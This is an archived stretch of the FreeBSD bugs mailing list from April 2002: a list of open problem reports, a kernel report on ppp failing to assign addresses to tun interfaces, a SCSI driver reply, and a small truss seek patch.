www6to4 version 1.5 o [2002/03/21] ports/36187 ports graphics/glide3: add PKGNAMESUFFIX, depen o [2002/03/21] bin/36189 [ftpd] it can not send a file on NTFS in o [2002/03/21] standards/36190standardsP1003.1-2001 newgrp command o [2002/03/21] standards/36191standardsP1003.1-2001 csplit utility f [2002/03/22] ports/36202 wosch update to sysutils/socket: NetBSD IPv6 pa o [2002/03/22] ports/36207 ports New port: databases/py-psycopg o [2002/03/22] ports/36208 ports New port: ipv6socket_scrub 1.0 f [2002/03/23] conf/36230 ipfw traffic shaper with DHCP env. o [2002/03/23] ports/36238 sf [patch] ftp/wget doesn't respect FTP_PASS o [2002/03/23] standards/36245jmallett Missing P1003.1-2001 fold -b and -s optio o [2002/03/24] ports/36248 ports Update Port:textproc/xerces-c(to 1.7.0) o [2002/03/24] ports/36249 kevlo Update Port:textproc/xerces-j(to 2.0.1) R o [2002/03/24] misc/36250 grog /dev/vinum device entries have a group of o [2002/03/24] ports/36251 ports New port: lang/cocor (Coco/R, a compiler a [2002/03/24] ports/36252 petef Fix build of misc/Howto / take maintainer o [2002/03/24] ports/36255 ports [MAINTAINER UPDATE] games/gnomekiss port o [2002/03/24] ports/36260 sobomax freetype2 needs libintl.so.1 in gettext-0 o [2002/03/24] bin/36262 [PATCH] Fixed rusers idle-time reporting o [2002/03/24] bin/36270 join(1) SYNOPSIS and usage() are misleadi o [2002/03/24] ports/36272 se Update port: ftp/jftpgw o [2002/03/24] kern/36274 75GXP drive ATA tagging failure makes df f [2002/03/24] ports/36276 dburr request for maintainership of devel/SN o [2002/03/25] ports/36297 nakai Update port: x11-wm/icewm o [2002/03/25] ports/36307 ports nmh port cuts off last part of sender dom o [2002/03/26] alpha/36327 alpha trap within cvt() while attempting to pri o [2002/03/26] kern/36330 ``device ed'' missing from the LINT confi o [2002/03/26] ports/36332 ports update from geda port. from version 20010 o [2002/03/26] ports/36333 nbm Update port deskutils/ithought to a5 o [2002/03/26] ports/36336 ports port of ccmalloc o [2002/03/26] ports/36341 dburr [patch] devel/SN marked as broken o [2002/03/26] ports/36345 ports New port: unrtf - converter from RTF to H o [2002/03/26] ports/36351 petef news/slrn: adding localization + dependen o [2002/03/26] ports/36355 ports xmcd port uses CDDB instead of FreeDB o [2002/03/26] misc/36359 fxp driver and Intel Pro/100 S NIC (0002B o [2002/03/26] ports/36361 ports apache13-ssl installs 'httpsd.conf' and l o [2002/03/26] ports/36364 ports apache13-ssl - 'make certificate' fails o [2002/03/27] ports/36367 ports New port: graphics/sinek / this supersede o [2002/03/27] misc/36368 sshd error: session_close_by_channel: ki o [2002/03/27] kern/36373 [PATCH] Introduction of non-strict IFF_NO o [2002/03/27] bin/36374 Patch (against core dumps) and improvemet o [2002/03/27] docs/36377 doc kernel path needs to be changed in -curre o [2002/03/27] ports/36379 ports New port: x11-fm/gnome-commander o [2002/03/27] ports/36380 ports new port: emulators/grustibus o [2002/03/27] kern/36381 ata + hw.ata.wc=1: high CPU load for larg o [2002/03/27] bin/36383 sed misbehaves with 2044 char substitute o [2002/03/27] misc/36385 luigi crunchgen does not handle Makefiles with o [2002/03/27] ports/36386 adrian www/squid24 might overwrite perms on log f [2002/03/27] ports/36388 knu pkgdb/portversion/portsdb doesn't agree w o [2002/03/27] misc/36392 cron starts before vi recover, and vi rec o [2002/03/27] bin/36397 incorrect information in ata(4) o [2002/03/27] kern/36402 Another Pen drive quirk o [2002/03/27] kern/36410 Bad mac address return from FNW-9803-T (A o [2002/03/28] conf/36416 imp Addition to /etc/defaults/pccard.conf o [2002/03/28] bin/36418 imp pccardd added option to exit after probe o [2002/03/28] kern/36425 bump up SYS_NMLN in sys/utsname.h o [2002/03/28] bin/36431 src/secure/lib/libtelnet fails in CURRENT o [2002/03/28] docs/36432 doc Proposal for doc/share/mk: make folded bo o [2002/03/28] docs/36449 doc symlink(7) manual doesn't mention trailin s [2002/03/28] ports/36452 ports Update port: security/fwlogwatch to 0.7 o [2002/03/28] docs/36456 doc csh(1) manual references wrong "signal.h" o [2002/03/28] docs/36459 doc tftp(1) manual's "get" syntax/description o [2002/03/28] gnu/36460 cu(1) program does not work very well. f [2002/03/28] ports/36463 matusita ports/net/jwhois - chase CVS version for o [2002/03/28] docs/36464 doc diff(1) manual doesn't explain "=format". f [2002/03/28] ports/36466 cy please remove biology/seaview a [2002/03/28] docs/36467 trhodes ed(4) manual has skimpy synopsis, etc. o [2002/03/28] bin/36470 dwmalone chpass(1) program has erroneous "usage" f o [2002/03/29] bin/36477 mailwrapper doesn't handle rmail calls o [2002/03/29] ports/36489 ports Change Mastersite for mail/majorcool o [2002/03/29] ports/36490 ports Update port mail/smail to 3.2.0.112 o [2002/03/29] ports/36493 ports www/frontpage-zh: NO_FP_LCID_SUB not defi o [2002/03/29] ports/36496 ports [MAINTAINER UPDATE] for editors/texmacs o [2002/03/29] bin/36501 /usr/bin/calendar can't handle recurring o [2002/03/29] ports/36503 ports several files conflict in ports/databases o [2002/03/29] ports/36506 ports Changed Mastersites for misc/us-zipcodes o [2002/03/29] ports/36520 ports LPRng port update (one more time...) o [2002/03/29] docs/36524 doc bad links on handbook index page f [2002/03/29] ports/36525 knu portupgrade, and pkgdb -F crash o [2002/03/29] ports/36527 ports New port: textproc/aft: text to [x]html,d f [2002/03/30] ports/36531 ports let eterm with chinese support o [2002/03/30] ports/36533 ports [PATCH] update of ja-kdrill to version 5. o [2002/03/30] misc/36536 Apparent mother board incompatability o [2002/03/30] ports/36537 tg bsd.python.mk: Add USE_PYDISTUTILS shorth o [2002/03/30] misc/36541 portmgr port: make install as normal user retries o [2002/03/30] ports/36543 ports New port: noip updater v1.6 o [2002/03/30] ports/36545 ports mwrite is an absolute symbolic link to /u o [2002/03/30] bin/36552 gad lpd doesn't delete spool files o [2002/03/30] bin/36553 Two new features in newsyslog(8) o [2002/03/30] misc/36556 patch: regular expressions for tcpwrapper o [2002/03/30] ports/36557 ports Fix port: security/py-amkCrypto (to refle o [2002/03/30] ports/36560 ports bug fix for the eperl package o [2002/03/30] ports/36561 nakai slib package bug fix o [2002/03/30] bin/36564 fdisk(8) program has misplaced NOT_NOW bl o [2002/03/31] ports/36568 vanilla New port: chinese/chinput3 o [2002/03/31] kern/36569 umass fails when RiteLink Pocket Disk is o [2002/03/31] kern/36573 [PATCH] add support for Abocom DU-E100 us o [2002/03/31] ports/36575 hoek Update port: converters/uudeview|converte o [2002/03/31] ports/36576 ports Update port: games/nethack3-gnome/games/n o [2002/03/31] ports/36581 mita Update port: japanese_ghostscript-gnu-cjk o [2002/03/31] ports/36582 taoka Update port: japanese_kinput2-freewnn to o [2002/03/31] ports/36585 ports Update port: news/yencode o [2002/03/31] ports/36587 ports news/inn{-stable} do not install when --e o [2002/04/01] docs/36618 doc [PATCH] Chapter Storage: bad link to mkis o [2002/04/01] ports/36619 ports A gtk SMB share browser o [2002/04/01] ports/36622 dburr [patch] devel/SN : Upgrade port to versio o [2002/04/01] bin/36626 login_cap(3) incorrectly claims that all o [2002/04/01] docs/36628 doc header an footer of openssl manpages are o [2002/04/01] docs/36629 kris OpenSSL manpages should be reachable with o [2002/04/01] bin/36634 murray dhclient is quiet and cannot be made loud o [2002/04/01] ports/36638 ports Update port: japanese/libslang o [2002/04/01] ports/36639 kde bug: building audio/kdemultimedia2 fails o [2002/04/01] ports/36640 kde bug: building deskutils/kdepim fails in - o [2002/04/01] ports/36644 ports new port -- gtkspell o [2002/04/01] misc/36646 dwmalone [PATCH] Top does not work correctly in a o [2002/04/01] ports/36648 ports new port: mail/archivemail: archive/compr o [2002/04/02] ports/36655 ports new port: www/smarty (The PHP compiling t o [2002/04/02] ports/36657 ports freeamp needs fixed to build on -current o [2002/04/02] ports/36659 ports Portupgrade WindowMaker 0.80 configuratio o [2002/04/02] misc/36660 re sysinstall dumps core when installing ove o [2002/04/02] bin/36671 /bin/sh problems with grouped pipe and ou o [2002/04/02] ports/36678 ports ports/net/cidr - make fetchable again o [2002/04/02] ports/36680 ports ports/net/ddup - make fetchable again o [2002/04/02] ports/36681 ports New port: streamtuner, a Perl/GTK+ SHOUTc o [2002/04/02] kern/36682 USB isochroneous transfer doesn't report o [2002/04/02] ports/36684 ports patch for http://www.freebsd.org/cgi/quer o [2002/04/02] ports/36685 ports annoying warnings from mc with tcsh in ho o [2002/04/02] ports/36688 mi [PATCH] linbot is no longer supported a [2002/04/02] ports/36689 anders fix for port net/priss for FreeBSD-5.0 o [2002/04/03] ports/36691 ports ports/devel/libformat has a checksum erro o [2002/04/03] kern/36692 Patch for E-Tech ISA PnP modem support o [2002/04/03] ports/36697 ports Additional Mastersite for x11-wm/9menu o [2002/04/03] ports/36698 ports Maintainerupdate graphics/vcdimager o [2002/04/03] ports/36705 ports Fix Build on CURRENT: databases/dbview o [2002/04/03] ports/36709 portmgr bsd.port.mk MASTER_SITES:n - add comma op o [2002/04/03] kern/36716 Add PCI_ENABLE_IO_MODES to -stable kernel o [2002/04/03] docs/36723 doc IPSec section is unintelligible o [2002/04/03] docs/36724 doc ipnat(5) manpage grammar is incomplete an o [2002/04/03] docs/36725 doc Handbook does not talk about FFS Snapshot o [2002/04/03] docs/36726 doc Handbook lacks information about hardware o [2002/04/03] docs/36727 trhodes Mail chapter of Handbook is incomplete o [2002/04/03] docs/36728 doc Handbook does not document VINUM o [2002/04/03] docs/36729 doc Handbook does not document non-sendmail M o [2002/04/04] ports/36734 ports security/vlog minor description issue o [2002/04/04] ports/36736 ports Update port: misc/most to 4.9.2 o [2002/04/04] bin/36738 [PATCH] newsyslog ownership race conditio o [2002/04/04] bin/36740 make ps obey locale (particularly for tim o [2002/04/04] ports/36752 ports Update port: print/ghostscript-afpl o [2002/04/04] bin/36757 EnhancementRequest binary which ought to o [2002/04/04] ports/36758 lioux Update port: audio/liba52 o [2002/04/04] ports/36762 ports Could not build port print/ghostscript-af o [2002/04/04] ports/36763 ports [MAINTAINER UPDATE] Update for port devel o [2002/04/04] ports/36766 ports Incompatibility between autoconf, automak o [2002/04/04] ports/36775 ports [PATCH] Fix build of x11/gdkxft with late o [2002/04/04] ports/36776 pat maintainer update: graphics/autotrace to o [2002/04/04] ports/36780 ports ports/shells/scsh tries to fetch a nonexi o [2002/04/05] standards/36783standardsP1003.1-2001 -s -A -j -N -t options for o o [2002/04/05] bin/36785 Add support for $ character in usernames o [2002/04/05] bin/36786 make ps use 24-hour time by default o [2002/04/05] ports/36788 ports audio/mp32ogg -> checksum mismatch o [2002/04/05] ports/36791 ports New port: devel/py-logging o [2002/04/05] ports/36792 ports Fix pkg-plist of shells/perlsh o [2002/04/05] ports/36794 ports mkcatalog help shows wrong default for -c o [2002/04/05] ports/36795 ports DocBook DSSSL stylesheets should install o [2002/04/05] ports/36801 ports Update port: misc/compat3x o [2002/04/05] ports/36802 ports Update port: misc/compat4x o [2002/04/05] ports/36803 ports Update port: lang/ghc o [2002/04/05] ports/36805 ports [PATCH] Unbreak audio/timidity++ on -CURR o [2002/04/05] ports/36806 portmgr bsd.port.mk MASTER_SITES:n group protecti o [2002/04/05] ports/36807 ports portupgrade port not working o [2002/04/05] ports/36809 ports [maintainer update] Add .el files to VM p o [2002/04/06] ports/36810 ports unbreak converters/libiconv when built by o [2002/04/06] ports/36812 ports update games/gracer for -current (unteste o [2002/04/06] ports/36815 ports new port: net/p5-Spread-Session o [2002/04/06] ports/36818 ports New port: editors/scribus o [2002/04/06] ports/36824 ports Update port: net/sntop to 1.4.3 o [2002/04/06] ports/36827 ports Update port: lang/yap to 4.3.20 o [2002/04/06] ports/36828 sobomax Mesa3 port broken when using XFREE86_VERS o [2002/04/06] ports/36829 ports New port: irc/ruby-rbot o [2002/04/06] ports/36830 ports /usr/ports/games/vamos slightly broken o [2002/04/06] ports/36832 ports apache13-* coredumps when using XML::Pars o [2002/04/06] docs/36837 doc Handbook lacks information about setting o [2002/04/07] ports/36841 ports use of .MAKEFLAGS target in Makefile.loca o [2002/04/07] ports/36842 ports irc/bitchx port needs update (c18 -> c19) o [2002/04/07] kern/36845 Add ioctls CDRIOCREADSPEED/WRITESPEED to o [2002/04/07] ports/36847 roger Fix build of graphics/vid broken cause of o [2002/04/07] ports/36848 ports Maintainer port update: emulators/uae o [2002/04/07] ports/36849 cy FVWM-Themes fails to switch themes o [2002/04/07] ports/36854 petef [patch] graphviz and colorize both instal o [2002/04/07] ports/36856 ports Maintainer Update: Fix some issues in lan o [2002/04/07] bin/36859 burncd fails in dao mode for audio o [2002/04/07] ports/36860 ports Maintainer Update: misc/tuxcards o [2002/04/07] ports/36862 ports port/math/spin update to 3.4.14 o [2002/04/07] ports/36865 ports the g-wrap-1.1.9 port is missing a requir o [2002/04/07] ports/36868 ports new port: net/py-spreadmodule o [2002/04/08] ports/36869 kuriyama Port update: palm/palmos-sdk o [2002/04/08] ports/36873 ports maintainer-update: print/pfaedit to 20020 o [2002/04/08] ports/36875 ports Unbreak portinstall a [2002/04/08] misc/36881 sound VIA VT82C688A problem, no sound o [2002/04/08] bin/36884 add support id_rsa (OpenSSH/RSA2) authent o [2002/04/08] ports/36887 tobez Update port: www/p5-CGI.pm 2.753 to 2.80 o [2002/04/08] conf/36894 Generate SSH2 RSA host key o [2002/04/08] ports/36897 trevor Update port: x11-wm/aewm o [2002/04/08] ports/36898 demon Update port: x11-wm/afterstep-stable to 1 o [2002/04/08] ports/36901 glewis WITHOUT_X11 Knob for port java/jdk13 o [2002/04/08] bin/36902 [patch] proposed new format code %N for s o [2002/04/08] ports/36903 ports www/horde2: upgrade to Horde 2.1 RC2. o [2002/04/08] ports/36904 ports mail/turba: upgrade from 1.0 to 1.1 RC2. o [2002/04/08] ports/36905 ports New port: devel/ruby-aspectr o [2002/04/08] ports/36906 ports mail/imp3: upgrade from 3.0 to 3.1 RC2. o [2002/04/08] ports/36908 ports New port: deskutils/nag - Horde's task li o [2002/04/08] ports/36913 ports New port: devel/ruby-rbprof o [2002/04/08] ports/36915 nbm Update port: mail/courier-imap (manpages o [2002/04/08] misc/36916 DOS active partition flag lost in libdisk o [2002/04/09] ports/36918 ports Update to ports/misc/uf-view o [2002/04/09] ports/36919 ports Update to ports/misc/uf-view o [2002/04/09] ports/36920 nbm LDAP compile options in courier-imap port o [2002/04/09] misc/36923 fdesc file system (partially) crashes Fre o [2002/04/09] ports/36931 ports New port converters/p5-Unicode-Map o [2002/04/09] ports/36932 ports New Port: scmxx 0.6.0 (Data Exchange util o [2002/04/09] ports/36933 portmgr [PATHCES] New feature for pkg_create and o [2002/04/09] ports/36935 ports devel/chora: fixing bad dependences list. o [2002/04/09] ports/36936 ports Update port: graphics/transcode to 0.6.0p o [2002/04/09] ports/36937 ports New port: graphics/dvdrip (overrides PR p o [2002/04/09] ports/36939 ports New Port: devel/popenhs -- A popen-like l o [2002/04/09] ports/36940 ports Port update acid-0.9.6b20 to acid-0.9.6b2 o [2002/04/09] ports/36945 ports new ports of libsigc++12 and gtkmm o [2002/04/09] ports/36947 ports New Port: lcrzo network library Fixed o [2002/04/09] ports/36948 ports New Port: lcrzoex, network testing toolbo o [2002/04/09] standards/36950standardsAdd -n to renice(8) o [2002/04/09] ports/36951 glewis Java (aka 1.3.1-p6-root-020405-00:26) cor o [2002/04/09] kern/36952 ldd comand of linux does not work o [2002/04/09] bin/36955 Stock ftpd does not reuse ports in passiv o [2002/04/10] ports/36956 ports linux-dri doesn't reflect the change to X o [2002/04/10] ports/36957 ports math/grace to 5.1.7 o [2002/04/10] ports/36959 ports New port: Gnewtellium is yet another new o [2002/04/10] bin/36960 calendar doesn't effect -t option. o [2002/04/10] ports/36962 ports new version of news/aub o [2002/04/10] ports/36967 ports New port: news/slrnface o [2002/04/10] ports/36969 marcus New port: x11/gnoclip - A desktop swicher o [2002/04/10] ports/36971 ports New port: news/cleanscore o [2002/04/10] i386/36972 ICH3 SMbus controller not correctly detec o [2002/04/10] ports/36976 jmz wrong description of XFree86-4 o [2002/04/10] ports/36982 ports Update Port: (graphics/gliv) to 1.5.1 fol o [2002/04/10] kern/36983 CD9660 unicode to utf-8 [hack] o [2002/04/10] ports/36984 ports GTKtalog is a tool to make disk catalog p [2002/04/10] docs/36985 trhodes [PATCH] - Various fixes for the tap(4) ma o [2002/04/10] ports/36987 ports Update Port: robocode to 1.0 follow ups p o [2002/04/10] ports/36989 ports Update Port: (ports/graphics/gdal) to 1.1 o [2002/04/11] conf/36990 pccard I/O DATA PCET10-CL worked p [2002/04/11] bin/36992 battlestar segfaults o [2002/04/11] ports/36994 ports New port: textproc/py-plex o [2002/04/11] ports/36995 ports New port: devel/pyrex o [2002/04/11] ports/36998 ports rsync: -z option core dumps on large file o [2002/04/11] ports/37000 ports New Port: agqt 0.9.1 (Audiogalaxy query t o [2002/04/11] ports/37001 ports New port: openag version 1.1 (Open source o [2002/04/11] ports/37002 ports Port Update: (security/fwlogwatch) from 0 o [2002/04/11] ports/37003 ports new port: misc/susv2 (Single UNIX Specifi o [2002/04/11] ports/37004 ports new port: misc/susv3 (Single UNIX Specifi o [2002/04/11] bin/37013 ls directory name output trailing slash d o [2002/04/11] ports/37014 petef [PATCH] add some knobs to x11-wm/fvwm2/Ma o [2002/04/12] ports/37016 ports update of xerces-c port o [2002/04/12] ports/37019 ports New port: poink 1.5 (Nosuid, secure ping o [2002/04/12] ports/37020 ports New port: www/muwi o [2002/04/12] ports/37023 obrien editors/vim misses the (optional) depende o [2002/04/12] ports/37025 ports [MAINTAINER UPDATe][PATCH] Update for por o [2002/04/12] ports/37027 ports New port: lookout-1.1 (Outlook 97 address o [2002/04/12] ports/37028 ports New port: www/scgi o [2002/04/13] misc/37034 Fixed maximum character length in EUC o [2002/04/13] bin/37036 Make "periodic" output show positive "end o [2002/04/13] docs/37037 keramida Cleaned and revised the Hubs article o [2002/04/13] bin/37038 fflagstostr and strtofflags don't recogni o [2002/04/13] ports/37039 keith update chinese/xcin2.5 o [2002/04/13] ports/37040 keith update chinese/libtabe to 0.2.5 o [2002/04/13] docs/37042 doc Further additions to PPPoA section of the o [2002/04/13] ports/37044 ports lesstif needs an update o [2002/04/13] misc/37047 daily_status_mailq_shorten doesn't produc o [2002/04/13] ports/37050 ports New port: audio/py-id3 o [2002/04/13] kern/37052 Quirk: ADS Tech Drive Kit 2.0 USB DA_Q_N o [2002/04/14] ports/37053 ports Update port: devel/py-optik o [2002/04/14] ports/37054 ports Problem report: (misc/flexbackup) doesnt o [2002/04/14] ports/37055 ports new port: irc/rbot o [2002/04/14] ports/37059 ports New port: gtk-iminc o [2002/04/14] docs/37061 jim Extra-spaces and wrong indentation in lap o [2002/04/14] ports/37062 ports New port: textproc/pocketreader o [2002/04/14] kern/37063 [PATCH] kernel does not support extended o [2002/04/14] ports/37066 ports ports/databases/postgresql-tcltk is not u o [2002/04/14] docs/37068 doc [PATCH] Handbook contains a wrong equatio a [2002/04/14] docs/37069 doc [PATCH] missing in serialco o [2002/04/14] ports/37070 ports ports/devel/p5-POE-Component-Client-UserA o [2002/04/14] misc/37073 Few new tips for FreeBSD-tips fortune o [2002/04/14] bin/37074 [PATCH] Typographical error in output of o [2002/04/14] ports/37076 ports ports/emulators/xmess misses a checksum o o [2002/04/14] bin/37079 des fetch complains about "size of remote fil o [2002/04/14] ports/37081 ports update for the pdftohtml port o [2002/04/14] bin/37083 small improvement to talk(1): add clocks o [2002/04/14] ports/37084 ports Fix port: graphics/py-gd o [2002/04/15] ports/37088 ports ports/lang/py-compiler is missing a check o [2002/04/15] ports/37089 ports Port: net/cvsup depends on X11 o [2002/04/15] ports/37092 ports update port: mail/openwebmail o [2002/04/15] docs/37094 doc wrong URL in vinum man pages o [2002/04/15] ports/37095 ports ports/net/p5-Net-SSH-Perl already builds o [2002/04/15] bin/37096 Fixes to fsdb command-line handling [patc o [2002/04/15] ports/37098 ports Update patches for slib port o [2002/04/15] ports/37100 ports Maintainer update: textproc/dico (portsur o [2002/04/15] ports/37101 ports Maintainer update: x11-toolkits/fl_editor o [2002/04/15] ports/37102 ports Maintainer update: databases/mysql-gui (p o [2002/04/15] ports/37103 ports Update port: games/rocksndiamonds from 2. 2122 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 12:20:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 020EC37B405 for ; Mon, 15 Apr 2002 12:20:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FJK0q40406; Mon, 15 Apr 2002 12:20:00 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 69A2C37B400 for ; Mon, 15 Apr 2002 12:12:12 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FJCCJ39250; Mon, 15 Apr 2002 12:12:12 -0700 (PDT) (envelope-from nobody) Message-Id: <200204151912.g3FJCCJ39250@freefall.freebsd.org> Date: Mon, 15 Apr 2002 12:12:12 -0700 (PDT) From: Brian Curnow To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/37109: Kernel refuses to assign unused IP to tun via ppp after some time Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37109 >Category: kern >Synopsis: Kernel refuses to assign unused IP to tun via ppp after some time >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Apr 15 12:20:00 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Brian Curnow >Release: 4.5-STABLE >Organization: >Environment: 4.5-STABLE FreeBSD 4.5-STABLE #0: Sat Apr 6 14:09:35 PST 2002 >Description: Using pptpd, ppp. Appears to be a kernel bug which believes that certain IPs, after having previously been used on interface, are still in use and refuses to allow ppp to assign them. Given enough time, this will cause even large ranges of IP to be unusable until reboot. I believe this is a kernel bug because my look at the ppp code seemed to be that ppp does not keep any state on IP or interface use, and tries range until the kernel accepts one that is offered. System is SMP. ppp.log errors: Error: iface_inAdd: ioctl(SIOCAIFADDR): 10.0.0.3: File exists Error: ipcp_InterfaceUp: unable to set ip address Warning: iface_addr_Zap: ioctl(SIOCDIFADDR, 10.0.0.3): Can't assign requested address IN this case, 10.0.0.3 is the local IP side, and the actual IP that can't be assigned is the peer IP of 10.0.0.61. In this case, changing the peer IP in /etc/ppp/ppp.secret allowed the connection to proceed. Over time, all IPs will become unusable. >How-To-Repeat: running ppp via tun interface to pptpd seems to cause problem over time. Perhaps a race condition? >Fix: Unknown. Cure by reboot. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 13:40:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A8CD37B400 for ; Mon, 15 Apr 2002 13:40:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FKe2j56582; Mon, 15 Apr 2002 13:40:02 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 13:40:02 -0700 (PDT) Message-Id: <200204152040.g3FKe2j56582@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: =?ISO-8859-1?Q?G=E9rard_Roudier?= Subject: Re: kern/36549: sym driver fails on Tekram DC-390U in 486 machine Reply-To: =?ISO-8859-1?Q?G=E9rard_Roudier?= Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/36549; it has been noted by GNATS. From: =?ISO-8859-1?Q?G=E9rard_Roudier?= To: Matthias Andree Cc: Matthias Andree , Subject: Re: kern/36549: sym driver fails on Tekram DC-390U in 486 machine Date: Mon, 15 Apr 2002 23:31:43 +0200 (CEST) On Mon, 15 Apr 2002, Matthias Andree wrote: > The sad thing is, I can no longer reproduce this. What's sad? A system that failed and is now working is a great news. :-) > I'm getting this instead: > > sym0: <875> port 0xfc00-0xfcff mem 0xffbea000-0xffbeafff,0xffbebf00-0xffb= ebfff irq 11 at device 14.0 on pci0 > sym0: Tekram NVRAM, ID 7, Fast-20, SE, parity checking > sym0: open drain IRQ line driver, using on-chip SRAM > sym0: using LOAD/STORE-based firmware. > pci0: (vendor=3D0x1= 02b, dev=3D 0x051b) at 15.0 irq 9 > pcib1: at device 16.0 on pci0 > ... > ad0: 9671MB [19650/16/63] at ata0-master BIOSPIO > Waiting 2 seconds for SCSI devices to settle > (noperiph:sym0:0:-1:-1): SCSI BUS reset delivered. > (probe2:sym0:0:2:0): INQUIRY. CDB: 12 1 80 0 ff 0 > (probe2:sym0:0:2:0): ILLEGAL REQUEST asc:24,0 > (probe2:sym0:0:2:0): Invalid field in CDB > Creating DISK cd0 > pass0 at sym0 bus 0 target 2 lun 0 > pass0: Removable CD-ROM SCSI-2 device > pass0: 10.000MB/s transfers (10.000MHz, offset 15) > > I did upgrade the kernel to 4.5-RELEASE-p2 and change its configuration, > I can send the diffs of the kernels if so desired. Most important > changes: * drop cpu I686_CPU and cpu I386_CPU * drop device ncr (keeping = sym) > * change SCSI_DELAY=3D2000 (maybe the Plextor is not ready at the time it > is queried, Plextor drives don't boot from CD with Tekram unless the > reset->inquiry delay is >=3D 5 sec -- default 3 sec) * drop tons of other > devices I just diffed 4.5 againt 4.5-release and didn't find anything that can explain the new behaviour of your system. Only a small change in tcp_syncache.c seems significant, but I donnot know enough about this code to actually see if it may explain something. The drop of the CPU types does affect slightly the machine dependant code, but the additional code should have no effect for a 486 CPU. Btw, there are so few changes, it seems, between the system that failed and the one that almost work that it could be possible to decrementaly (or incrementaly) add (or remove) the changes that seem related to the difference and see which one makes difference. You may for example try: 1) Add again 686 and/or 386 CPU 2) Reverse the patch from tcp_syncache.c 3) Configure again ncr 4) Restore previous SCSI_DELAY =2E..) All the changes I missed Until your system fails again. Regards, G=E9rard. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 14:10:42 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 28E7D37B422 for ; Mon, 15 Apr 2002 14:10:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FLA2M65236; Mon, 15 Apr 2002 14:10:02 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 14:10:02 -0700 (PDT) Message-Id: <200204152110.g3FLA2M65236@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Thomas Quinot Subject: Re: bin/37104 [PATCH] Reply-To: Thomas Quinot Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37104; it has been noted by GNATS. From: Thomas Quinot To: bug-followup@freebsd.org Cc: Subject: Re: bin/37104 [PATCH] Date: Mon, 15 Apr 2002 23:04:29 +0200 The following patch seems to fix the problem. Addresses on the stack are beyond 2**31, i.e. a negative long. Changing the offset parameter to an off_t and using fseeko allows the correct seek to be made. addresses on the stack are beyond 2**31, i.e. some negative long value. --- usr.bin/truss/dist/syscalls.c Mon Apr 15 22:44:49 2002 +++ usr.bin/truss/syscalls.c Mon Apr 15 22:48:18 2002 @@ -137,7 +137,7 @@ err(1, "dup"); if ((p = fdopen(fd, "r")) == NULL) err(1, "fdopen"); - fseek(p, (long)offset, SEEK_SET); + fseeko(p, (unsigned long)offset, SEEK_SET); for (pos = (char *)buf; len--; pos++) { if ((c = fgetc(p)) == EOF) return -1; @@ -167,7 +167,7 @@ buf = malloc( size = (max ? max : 64 ) ); len = 0; buf[0] = 0; - fseek(p, (long)offset, SEEK_SET); + fseeko(p, (unsigned long)offset, SEEK_SET); while ((c = fgetc(p)) != EOF) { buf[len++] = c; if (c == 0 || len == max) { Thomas. -- Thomas.Quinot@Cuivre.FR.EU.ORG To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 15:24:29 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11]) by hub.freebsd.org (Postfix) with SMTP id 8FC5E37B41B for ; Mon, 15 Apr 2002 15:24:22 -0700 (PDT) Received: from lanczos.maths.tcd.ie by salmon.maths.tcd.ie with SMTP id ; 15 Apr 2002 23:24:21 +0100 (BST) Date: Mon, 15 Apr 2002 23:24:19 +0100 From: David Malone To: Thomas Quinot Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/37104 [PATCH] Message-ID: <20020415222419.GA46761@lanczos.maths.tcd.ie> References: <200204152110.g3FLA2M65236@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200204152110.g3FLA2M65236@freefall.freebsd.org> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: 